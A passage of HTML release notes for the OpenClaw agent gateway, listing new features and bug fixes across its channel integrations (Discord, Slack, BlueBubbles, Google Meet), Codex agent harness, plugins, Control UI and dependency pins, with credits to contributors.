<p>Providers/OpenAI: add <code>extraBody</code>/<code>extra_body</code> passthrough for OpenAI-compatible TTS endpoints, so custom speech servers can receive fields such as <code>lang</code> in <code>/audio/speech</code> requests. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041341848" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39900" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39900/hovercard" href="https://github.com/openclaw/openclaw/issues/39900">#39900</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/R3NK0R/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/R3NK0R">@R3NK0R</a>.</p>
</li>
<li>
<p>Dependencies: refresh workspace dependency pins, including TypeBox 1.1.37, AWS SDK 3.1041.0, Microsoft Teams 2.0.9, and Marked 18.0.3. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>, <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/aws/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aws">@aws</a>, and <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/microsoft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/microsoft">@microsoft</a>.</p>
</li>
<li>
<p>Discord/channels: add reusable message-channel access groups plus Discord channel-audience DM authorization, so allowlists can reference <code>accessGroup:&lt;name&gt;</code> across channel auth paths. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366657956" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75813" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75813/hovercard" href="https://github.com/openclaw/openclaw/pull/75813">#75813</a>)</p>
</li>
<li>
<p>Crabbox/scripts: print the selected Crabbox binary, version, and supported providers before <code>pnpm crabbox:*</code> commands, and reject stale binaries that lack <code>blacksmith-testbox</code> provider support.</p>
</li>
<li>
<p>Agents/Codex: add committed happy-path prompt snapshots for Codex/message-tool Telegram direct, Discord group, and heartbeat turns so prompt drift can be reviewed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Dependencies: refresh bundled runtime and plugin dependency pins, including Pi 0.71.1, OpenAI 6.35.0, Codex 0.128.0, Zod 4.4.1, and Matrix 41.4.0. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</p>
</li>
<li>
<p>Agents/workspace: add <code>agents.defaults.skipOptionalBootstrapFiles</code> for skipping selected optional workspace files during bootstrap without disabling required workspace setup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4213876746" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62110" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62110/hovercard" href="https://github.com/openclaw/openclaw/pull/62110">#62110</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mainstay22/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mainstay22">@mainstay22</a>.</p>
</li>
<li>
<p>Plugins/CLI: add first-class <code>git:</code> plugin installs with ref checkout, commit metadata, normal scanner/staging, and <code>plugins update</code> support for recorded git sources. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/badlogic/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/badlogic">@badlogic</a>.</p>
</li>
<li>
<p>Google Meet: add live caption health for Chrome transcribe mode, including caption observer state, transcript counters, last caption text, and recent transcript lines in status and doctor output. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</p>
</li>
<li>
<p>Voice Call/Google Meet: add Twilio Meet join phase logs around pre-connect DTMF, realtime stream setup, and initial greeting handoff for easier live-call debugging. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</p>
</li>
<li>
<p>macOS app: move recent session context rows into a Context submenu while keeping usage and cost details root-level, so the menu bar companion stays compact with many active sessions. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Guti/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Guti">@Guti</a>.</p>
</li>
<li>
<p>Gateway/SDK: add SDK-facing tools.invoke RPC with shared HTTP policy, typed approval/refusal results, and SDK helper support. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354626015" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74705" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74705/hovercard" href="https://github.com/openclaw/openclaw/issues/74705">#74705</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ai-hpc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ai-hpc">@ai-hpc</a>.</p>
</li>
<li>
<p>Discord: keep active buttons, selects, and forms working across Gateway restarts until they expire, so multi-step Discord interactions are less likely to break during upgrades or restarts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Messages/docs: clarify that <code>BodyForAgent</code> is the primary inbound model text while <code>Body</code> is the legacy envelope fallback, and add Signal coverage so channel hardening patches target the real prompt path. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4258357958" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66198" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66198/hovercard" href="https://github.com/openclaw/openclaw/pull/66198">#66198</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/defonota3box/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/defonota3box">@defonota3box</a>.</p>
</li>
<li>
<p>Slack: publish a safe default App Home tab view on <code>app_home_opened</code> and include the Home tab event in setup manifests. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3911903854" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/11655" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/11655/hovercard" href="https://github.com/openclaw/openclaw/issues/11655">#11655</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4114456932" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52020" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52020/hovercard" href="https://github.com/openclaw/openclaw/issues/52020">#52020</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TinyTb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TinyTb">@TinyTb</a>.</p>
</li>
<li>
<p>Slack: keep track of bot-participated threads across restarts, so ongoing threaded conversations can continue auto-replying after the Gateway is restarted. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Control UI/Usage: add UTC quarter-hour token buckets for the Usage Mosaic and reuse them for hour filtering, keeping the legacy session-span fallback for older summaries. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350628281" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74337" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74337/hovercard" href="https://github.com/openclaw/openclaw/pull/74337">#74337</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/konanok/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/konanok">@konanok</a>.</p>
</li>
<li>
<p>BlueBubbles: add opt-in <code>channels.bluebubbles.replyContextApiFallback</code> that fetches the original message from the BlueBubbles HTTP API when the in-memory reply-context cache misses (multi-instance deployments sharing one BB account, post-restart, after long-lived TTL/LRU eviction). Off by default; channel-level setting propagates to accounts that omit the flag through <code>mergeAccountConfig</code>; routed through the typed <code>BlueBubblesClient</code> so every fetch is SSRF-guarded by the same three-mode policy as every other BB client request; reply-id shape is validated and part-index prefixes (<code>p:0/&lt;guid&gt;</code>) are stripped before the request; concurrent webhooks for the same <code>replyToId</code> coalesce into one fetch and successful responses populate the reply cache for subsequent hits. Also promotes BlueBubbles attachment download failures from verbose to runtime error so silently-dropped inbound images are visible at default log level, and extends <code>sanitizeForLog</code> to redact <code>?password=…</code>/<code>?token=…</code> query params and <code>Authorization:</code> headers before they reach the log sink (CWE-532). (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329493815" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71820" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71820/hovercard" href="https://github.com/openclaw/openclaw/pull/71820">#71820</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coletebou/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coletebou">@coletebou</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zqchris/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zqchris">@zqchris</a>.</p>
</li>
<li>
<p>CLI/proxy: add <code>openclaw proxy validate</code> so operators can verify effective proxy configuration, proxy reachability, and expected allow/deny destination behavior before deploying proxy-routed OpenClaw commands. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341892839" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73438" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73438/hovercard" href="https://github.com/openclaw/openclaw/pull/73438">#73438</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesse-merhi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesse-merhi">@jesse-merhi</a>.</p>
</li>
<li>
<p>Agents/Codex: default Codex app-server dynamic tools to native-first, keeping OpenClaw integration tools while leaving file, patch, exec, and process ownership to the Codex harness. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361939028" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75308" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75308/hovercard" href="https://github.com/openclaw/openclaw/pull/75308">#75308</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Agents/Codex: default Codex-harness direct source replies to the OpenClaw <code>message</code> tool when visible reply delivery is not explicitly configured, keeping channel-visible output as a deliberate tool call. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365795107" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75765" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75765/hovercard" href="https://github.com/openclaw/openclaw/pull/75765">#75765</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Heartbeats/agents: add a structured <code>heartbeat_respond</code> tool for tool-capable heartbeat runs so agents can record quiet outcomes or explicit notification text without relying only on <code>HEARTBEAT_OK</code> parsing. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365795107" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75765" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75765/hovercard" href="https://github.com/openclaw/openclaw/pull/75765">#75765</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Gateway/config: allow <code>$include</code> directives to read files from operator-approved <code>OPENCLAW_INCLUDE_ROOTS</code> directories while preserving default config-directory confinement. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ificator/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ificator">@ificator</a>.</p>
</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>
<p>Agents/OpenAI: default GPT-5 API-key sessions to the SSE Responses transport unless WebSocket is explicitly selected, restoring replies in fresh Control UI and WebChat beta installs where the auto WebSocket path connected but produced no model events.</p>
</li>
<li>
<p>Agents/sessions: preserve terminal lifecycle state when final run metadata persists from a stale in-memory snapshot, preventing sessions from staying stuck as running after completed or timed-out turns.</p>
</li>
<li>
<p>Gateway/CLI: make <code>openclaw gateway start</code> repair stale managed service definitions that point at old OpenClaw versions, missing binaries, or temporary installer paths before starting.</p>
</li>
<li>
<p>Updates/plugins: keep packaged upgrades and beta external plugin installs on stable runtime aliases and matching prerelease npm specs, avoiding stale WebChat runtime chunks and old Twitch packages after upgrading from 2026.4.29.</p>
</li>
<li>
<p>Codex/app-server: resolve managed binaries from bundled <code>dist</code> chunks and from the <code>@openai/codex</code> package bin when installs do not provide a nearby <code>.bin/codex</code> shim, avoiding false missing-binary startup failures.</p>
</li>
<li>
<p>Status: show the <code>openai-codex</code> OAuth profile for <code>openai/gpt-*</code> sessions running through the native Codex runtime instead of reporting auth as unknown. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369662899" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76197" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76197/hovercard" href="https://github.com/openclaw/openclaw/pull/76197">#76197</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: use the ClawHub artifact resolver response as the install decision before downloading, keeping legacy ZIP fallback and future ClawPack npm-pack installs on the same explicit resolver path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: keep bare plugin package specs on npm for the launch cutover and reserve ClawHub resolution for explicit <code>clawhub:</code> specs until ClawHub pack readiness is deployed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/source checkout: discover source-only plugins such as Codex from the <code>extensions/*</code> workspace while using npm package excludes as the packaged-core boundary, removing the stale core-bundle metadata path.</p>
</li>
<li>
<p>Plugins/ClawHub: install ClawPack artifacts from the explicit npm-pack <code>.tgz</code> resolver path and persist artifact kind, npm integrity, shasum, and tarball metadata for update and diagnostics flows. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Control UI: allow deployments to configure grouped chat message max-width with a validated <code>gateway.controlUi.chatMessageMaxWidth</code> setting instead of patching bundled CSS after upgrades. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4279800285" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67935" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67935/hovercard" href="https://github.com/openclaw/openclaw/issues/67935">#67935</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xiew4589-lang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xiew4589-lang">@xiew4589-lang</a>.</p>
</li>
<li>
<p>Control UI/Cron: ignore malformed persisted cron rows without valid payloads before they enter UI state and guard stale cron render paths, preventing blank Control UI sections after a bad cron snapshot. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4141837644" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55047" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55047/hovercard" href="https://github.com/openclaw/openclaw/issues/55047">#55047</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4134780011" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54439" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54439/hovercard" href="https://github.com/openclaw/openclaw/issues/54439">#54439</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4136558129" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54550" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54550/hovercard" href="https://github.com/openclaw/openclaw/pull/54550">#54550</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4136644421" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54552" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54552/hovercard" href="https://github.com/openclaw/openclaw/pull/54552">#54552</a>.</p>
</li>
<li>
<p>Control UI/sessions: bound the default Sessions tab query to recent activity and fewer rows, avoiding expensive full-history loads while keeping filters editable. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368768078" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76050" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76050/hovercard" href="https://github.com/openclaw/openclaw/issues/76050">#76050</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368768844" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76051" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76051/hovercard" href="https://github.com/openclaw/openclaw/pull/76051">#76051</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Neomail2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Neomail2">@Neomail2</a>.</p>
</li>
<li>
<p>Gateway/channels: cap startup fanout at four channel/account handoffs and recover from Bonjour ciao self-probe races, reducing Windows startup stalls with many Telegram accounts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364841887" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75687" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75687/hovercard" href="https://github.com/openclaw/openclaw/issues/75687">#75687</a>.</p>
</li>
<li>
<p>Gateway/sessions: keep <code>sessions.list</code> polling responsive on large session stores by reusing list-safe session cache/indexes and returning a lightweight compaction checkpoint preview instead of heavyweight summaries. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rolandrscheel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rolandrscheel">@rolandrscheel</a>.</p>
</li>
<li>
<p>Control UI/Gateway: keep long-running dashboard WebSocket sessions alive with protocol pings and keep Stop available after reconnect or reload by recovering session-scoped active-run abort state. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4321259716" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70991" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70991/hovercard" href="https://github.com/openclaw/openclaw/issues/70991">#70991</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexandre-leng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexandre-leng">@alexandre-leng</a>.</p>
</li>
<li>
<p>CLI/update: treat inherited Gateway service markers as origin hints and only block package replacement when the managed Gateway is still live, so self-updates can stop the service and continue safely. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365329462" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75729" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75729/hovercard" href="https://github.com/openclaw/openclaw/pull/75729">#75729</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hxy91819/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hxy91819">@hxy91819</a>.</p>
</li>
<li>
<p>Agents/failover: exempt run-level timeouts that fire during tool execution from model fallback, timeout-triggered compaction, and generic timeout payload synthesis, avoiding misleading "LLM request timed out" errors after the primary model has already responded. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4115327379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52147" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52147/hovercard" href="https://github.com/openclaw/openclaw/issues/52147">#52147</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367303713" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75873" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75873/hovercard" href="https://github.com/openclaw/openclaw/pull/75873">#75873</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/simonusa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/simonusa">@simonusa</a>.</p>
</li>
<li>
<p>Docker: copy Bun 1.3.13 from a digest-pinned image and keep CI on the same version. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350919036" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74356" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74356/hovercard" href="https://github.com/openclaw/openclaw/issues/74356">#74356</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fede-kamel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fede-kamel">@fede-kamel</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sallyom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sallyom">@sallyom</a>.</p>
</li>
<li>
<p>Agents/compaction: keep prior context on consecutive turns against z.ai-style providers (z.ai direct, openrouter z-ai/*, in-house GLM gateways), avoiding accidental Pi state reset after successful turns. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368789014" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76056" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76056/hovercard" href="https://github.com/openclaw/openclaw/pull/76056">#76056</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a>.</p>
</li>
<li>
<p>Doctor/plugins: run a one-time 2026.5.2 configured-plugin install repair based on <code>meta.lastTouchedVersion</code>, installing actively used downloadable OpenClaw plugins through the configured external source before marking the config touched for the release.</p>
</li>
<li>
<p>Sessions/transcripts: use one <code>session.writeLock.acquireTimeoutMs</code> policy for session transcript lock acquisitions and raise the default wait to 60 seconds, avoiding user-visible lock timeouts during legitimate slow prep, cleanup, compaction, and mirror work. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367529883" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75894" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75894/hovercard" href="https://github.com/openclaw/openclaw/issues/75894">#75894</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shandutta/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shandutta">@shandutta</a>.</p>
</li>
<li>
<p>Control UI: contain the standalone iOS PWA viewport with safe-area-aware document locking, so Add-to-Home-Screen launches cannot scroll past the device bounds. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368888109" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76072" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76072/hovercard" href="https://github.com/openclaw/openclaw/pull/76072">#76072</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kvncrw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kvncrw">@kvncrw</a>.</p>
</li>
<li>
<p>Agents/restart recovery: match cleaned transcript locks by exact transcript lock paths plus the canonical session fallback, so interrupted main sessions using topic-suffixed transcripts resume after gateway restart. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368769053" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76052" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76052/hovercard" href="https://github.com/openclaw/openclaw/pull/76052">#76052</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anyech/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anyech">@anyech</a>.</p>
</li>
<li>
<p>Agents/runtime: cache the stable system-prompt prefix and reuse prompt-report tool schema stats during dispatch prep, reducing repeated CPU work before streaming starts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368424894" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75999" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75999/hovercard" href="https://github.com/openclaw/openclaw/issues/75999">#75999</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368807955" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76061" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76061/hovercard" href="https://github.com/openclaw/openclaw/issues/76061">#76061</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zackchiutw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zackchiutw">@zackchiutw</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/STLI69/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/STLI69">@STLI69</a>.</p>
</li>
<li>
<p>Control UI/WebChat: use high-contrast text selection colors so highlighted chat text stays visible across themes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204728608" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60850" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60850/hovercard" href="https://github.com/openclaw/openclaw/issues/60850">#60850</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204759217" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60854" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60854/hovercard" href="https://github.com/openclaw/openclaw/pull/60854">#60854</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Badschaff/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Badschaff">@Badschaff</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/efe-arv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/efe-arv">@efe-arv</a>.</p>
</li>
<li>
